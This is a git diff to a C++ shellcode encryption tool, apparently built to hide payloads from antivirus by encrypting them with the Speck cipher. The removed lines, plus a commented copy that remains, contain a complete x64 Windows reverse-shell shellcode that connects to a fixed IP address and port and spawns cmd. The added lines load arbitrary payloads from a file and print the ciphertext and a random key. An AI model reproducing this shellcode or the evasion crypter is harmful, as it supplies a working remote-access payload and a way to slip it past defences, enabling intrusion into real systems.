S12cybersecurity · Karkas66 · Feb 20, 2026
diff --git a/SpeckShellcodeEncryption/SpeckShellcodeEncryption/SpeckShellcodeEncryption.cpp b/SpeckShellcodeEncryption/SpeckShellcodeEncryption/SpeckShellcodeEncryption.cpp
@@ -76,7 +76,7 @@ uint64_t rand64() {
 	return ((uint64_t)rand() << 32) | rand();
 }
 
-int main() {
+int main(int argc, char* argv[]) {
 	//char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
 	//	"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
 	//	"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
@@ -100,50 +100,50 @@ int main() {
 
 
 	generateCrc32Table();
-	srand((unsigned int)time(NULL)); // Seed for random IV
-
-	unsigned char payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
-"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
-"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
-"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
-"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
-"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
-"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
-"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
-"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
-"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
-"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
-"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
-"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
-"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
-"\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
-"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00"
-"\x00\x49\x89\xe5\x49\xbc\x02\x00\x04\xbc\x0a\xe7\xdd\xde"
-"\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
-"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29"
-"\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48"
-"\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea"
-"\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
-"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81"
-"\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00"
-"\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0"
-"\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01"
-"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41"
-"\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d"
-"\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48"
-"\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
-"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5"
-"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
-"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
-
-
-	const char* keyStr = "f7Ea9C2b4D10xL8zQ5Wk3P6rIeG0jN7o";
+    srand((unsigned int)time(NULL)); // Seed for random IV
+
+    // Read payload from file specified via argv and convert file content to unsigned char array named 'payload'
+    if (argc < 2) {
+        printf("Usage: %s <payload_file>\n", argv[0]);
+        return 1;
+    }
+
+    FILE* f = fopen(argv[1], "rb");
+    if (!f) {
+        perror("fopen");
+        return 1;
+    }
+    if (fseek(f, 0, SEEK_END) != 0) { fclose(f); return 1; }
+    long fileSize = ftell(f);
+    if (fileSize < 0) { fclose(f); return 1; }
+    rewind(f);
+    unsigned char* payload = (unsigned char*)malloc((size_t)fileSize);
+    if (!payload) { fclose(f); return 1; }
+    size_t readBytes = fread(payload, 1, (size_t)fileSize, f);
+    fclose(f);
+    if (readBytes != (size_t)fileSize) { free(payload); return 1; }
+
+
+
+    // Generate a random key string with the same length as the original hardcoded value
+    const char* orig = "f7Ea9C2b4D10xL8zQ5Wk3P6rIeG0jN7o";
+    size_t keyLen = strlen(orig);
+    char* keyStr = (char*)malloc(keyLen + 1);
+    if (!keyStr) { free(payload); return 1; }
+    const char* charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
+    size_t charsetLen = strlen(charset);
+    for (size_t i = 0; i < keyLen; i++) {
+        keyStr[i] = charset[rand() % charsetLen];
+    }
+    keyStr[keyLen] = '\0';
+    //Better output later for visibility
+	//printf("Random keyStr: %s\n", keyStr);
 	//const char* keyStr = "19181110090801001110980801000908";
 	uint64_t key[2];
 	parseHexKey(keyStr, key);
 	speckKeySchedule(key);
 
-	int payloadLen = sizeof(payload) - 1;
+    int payloadLen = (int)readBytes;
 	int paddedLen = (payloadLen + BLOCK_BYTES - 1) & ~(BLOCK_BYTES - 1);
 
 	// Allocate buffer for IV + encrypted shellcode
@@ -174,7 +174,8 @@ int main() {
 		printf("\\x%02x", encryptedBuffer[i]);
 	}
 	printf("\n\n");
-
+	printf("Random keyStr: %s\n", keyStr);
+	printf("\n\n");
 	// ==================== DECRYPTION ====================
 	unsigned char* decryptBuffer = (unsigned char*)malloc(paddedLen);
 	memcpy(decryptBuffer, encryptedBuffer + BLOCK_BYTES, paddedLen);
@@ -202,7 +203,9 @@ int main() {
 	else
 		printf("\nDecryption FAILED: corruption detected.\n");
 
-	free(encryptedBuffer);
-	free(decryptBuffer);
+    free(keyStr);
+    free(payload);
+    free(encryptedBuffer);
+    free(decryptBuffer);
 	return 0;
 }